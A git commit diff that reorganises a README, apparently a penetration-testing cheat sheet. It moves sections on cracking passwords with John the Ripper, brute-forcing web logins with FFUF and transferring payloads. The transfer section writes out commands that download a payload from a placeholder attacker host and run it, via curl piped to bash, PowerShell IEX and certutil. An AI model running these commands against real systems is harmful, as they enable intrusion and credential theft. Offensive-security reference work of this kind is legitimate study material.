Update README.md
This commit is contained in:
Joe Totes
288
README.md
288
README.md
@@ -567,6 +567,15 @@ upload {FILE.exe}
|
||||
```
|
||||
|
||||
|
||||
<br />
|
||||
|
||||
# Active Directory
|
||||
|
||||
***
|
||||
<br />
|
||||
|
||||
https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png
|
||||
|
||||
<br />
|
||||
|
||||
# Buffer Overflow
|
||||
@@ -633,148 +642,11 @@ python3 exploit.py
|
||||
|
||||
<br />
|
||||
|
||||
# Password Cracking
|
||||
|
||||
***
|
||||
|
||||
## John The Ripper
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# About: A tool used to crack passwords, hashes, and zip files
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
|
||||
sudo zip2john {FILE.zip} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
|
||||
sudo rar2john {FILE.rar} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a password file {FILE.txt}
|
||||
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
|
||||
|
||||
# --format={HASH}: Specifiy a hash type to crack (see below)
|
||||
john --format=Raw-MD5 {FILE.txt}
|
||||
|
||||
:'
|
||||
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
|
||||
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
|
||||
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
|
||||
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
|
||||
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
|
||||
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
|
||||
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
|
||||
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
|
||||
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
|
||||
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
|
||||
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
|
||||
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
|
||||
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
|
||||
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
|
||||
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
|
||||
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
|
||||
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
|
||||
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
|
||||
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
|
||||
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
|
||||
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
|
||||
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
|
||||
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
|
||||
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
|
||||
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
|
||||
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
|
||||
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
|
||||
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
|
||||
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
|
||||
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
|
||||
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
|
||||
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
|
||||
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
|
||||
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
|
||||
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
|
||||
dummy, crypt
|
||||
'
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
## FFUF
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# FFUF
|
||||
# About: A tool used to brute force web credentials
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - One variable FUZZ
|
||||
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
|
||||
|
||||
|
||||
# EXAMPLE {FILE}
|
||||
username=admin$password=FUZZ
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
# Payload File Transfer
|
||||
|
||||
***
|
||||
|
||||
#### [STEP 1] Python Server on Client
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Python Server
|
||||
# About: A python command used to open a server on the client machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# USAGE - Host on client machine
|
||||
sudo python3 -m http.server {PORT}
|
||||
|
||||
# {PORT}: Port to open for file transfer
|
||||
```
|
||||
<br />
|
||||
|
||||
#### [STEP 2] Download Command on Server
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# WGET
|
||||
# About: A command used to download files on the current machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Download on server machine
|
||||
wget {IP ADDRESS}/{FILE} -outfile {FILE}
|
||||
curl {IP ADDRESS}/{FILE}
|
||||
|
||||
# Linux - Download file and execute in bash:
|
||||
curl {IP ADDRESS}/{FILE.sh} | bash
|
||||
|
||||
# Windows - Download file and execute in powershell:
|
||||
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
||||
powershell -c 'Invoke-AllChecks'
|
||||
|
||||
# Windows - Download file using certutil
|
||||
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
||||
|
||||
# Windows - Download file using powershell
|
||||
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
||||
|
||||
# {IP ADDRESS}: IP Address of the client from step one (python server)
|
||||
# {FILE}: The payload to be transferred
|
||||
```
|
||||
<br />
|
||||
|
||||
# Privilege Escalation
|
||||
|
||||
<br />
|
||||
|
||||
## Windows - Winpeas
|
||||
## Windows
|
||||
|
||||
<br />
|
||||
|
||||
@@ -816,7 +688,7 @@ Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | selec
|
||||
```
|
||||
<br />
|
||||
|
||||
## Linux - Linpeas
|
||||
## Linux
|
||||
|
||||
<br />
|
||||
|
||||
@@ -881,6 +753,144 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
|
||||
```
|
||||
<br />
|
||||
|
||||
|
||||
# Password Cracking
|
||||
|
||||
***
|
||||
|
||||
#### John The Ripper
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# About: A tool used to crack passwords, hashes, and zip files
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
|
||||
sudo zip2john {FILE.zip} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
|
||||
sudo rar2john {FILE.rar} > {FILE.txt}
|
||||
|
||||
# Usage - Crack a password file {FILE.txt}
|
||||
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
|
||||
|
||||
# --format={HASH}: Specifiy a hash type to crack (see below)
|
||||
john --format=Raw-MD5 {FILE.txt}
|
||||
|
||||
:'
|
||||
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
|
||||
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
|
||||
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
|
||||
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
|
||||
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
|
||||
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
|
||||
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
|
||||
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
|
||||
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
|
||||
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
|
||||
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
|
||||
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
|
||||
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
|
||||
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
|
||||
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
|
||||
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
|
||||
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
|
||||
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
|
||||
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
|
||||
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
|
||||
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
|
||||
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
|
||||
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
|
||||
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
|
||||
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
|
||||
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
|
||||
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
|
||||
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
|
||||
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
|
||||
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
|
||||
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
|
||||
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
|
||||
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
|
||||
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
|
||||
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
|
||||
dummy, crypt
|
||||
'
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
### FFUF
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# FFUF
|
||||
# About: A tool used to brute force web credentials
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - One variable FUZZ
|
||||
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
|
||||
|
||||
|
||||
# EXAMPLE {FILE}
|
||||
username=admin$password=FUZZ
|
||||
|
||||
```
|
||||
<br />
|
||||
|
||||
# Payload File Transfer
|
||||
|
||||
***
|
||||
|
||||
#### [STEP 1] Python Server on Client
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Python Server
|
||||
# About: A python command used to open a server on the client machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# USAGE - Host on client machine
|
||||
sudo python3 -m http.server {PORT}
|
||||
|
||||
# {PORT}: Port to open for file transfer
|
||||
```
|
||||
<br />
|
||||
|
||||
#### [STEP 2] Download Command on Server
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# WGET
|
||||
# About: A command used to download files on the current machine
|
||||
# Download: Pre-installed on Kali Linux
|
||||
|
||||
# Usage - Download on server machine
|
||||
wget {IP ADDRESS}/{FILE} -outfile {FILE}
|
||||
curl {IP ADDRESS}/{FILE}
|
||||
|
||||
# Linux - Download file and execute in bash:
|
||||
curl {IP ADDRESS}/{FILE.sh} | bash
|
||||
|
||||
# Windows - Download file and execute in powershell:
|
||||
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
||||
powershell -c 'Invoke-AllChecks'
|
||||
|
||||
# Windows - Download file using certutil
|
||||
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
||||
|
||||
# Windows - Download file using powershell
|
||||
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
||||
|
||||
# {IP ADDRESS}: IP Address of the client from step one (python server)
|
||||
# {FILE}: The payload to be transferred
|
||||
```
|
||||
<br />
|
||||
|
||||
|
||||
# Reverse Shell
|
||||
|
||||
<br />
|
||||
|
||||
Reference in New Issue
Block a user